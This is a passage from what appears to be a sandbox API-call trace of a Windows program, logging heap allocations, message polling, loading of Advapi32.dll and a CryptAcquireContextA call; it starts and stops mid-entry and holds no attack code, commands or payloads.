returned 1 [0244.472] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.472] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0244.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0244.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.473] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0244.473] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0244.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.474] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.474] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.475] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0244.475] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.475] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0244.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0244.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.477] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.477] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0244.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.478] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0244.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0244.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0244.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0244.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0244.478] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0244.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0244.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0244.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a28 [0244.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0244.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0244.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0244.479] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0244.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0244.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0244.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0244.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0244.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0244.481] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0244.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0244.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0244.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: 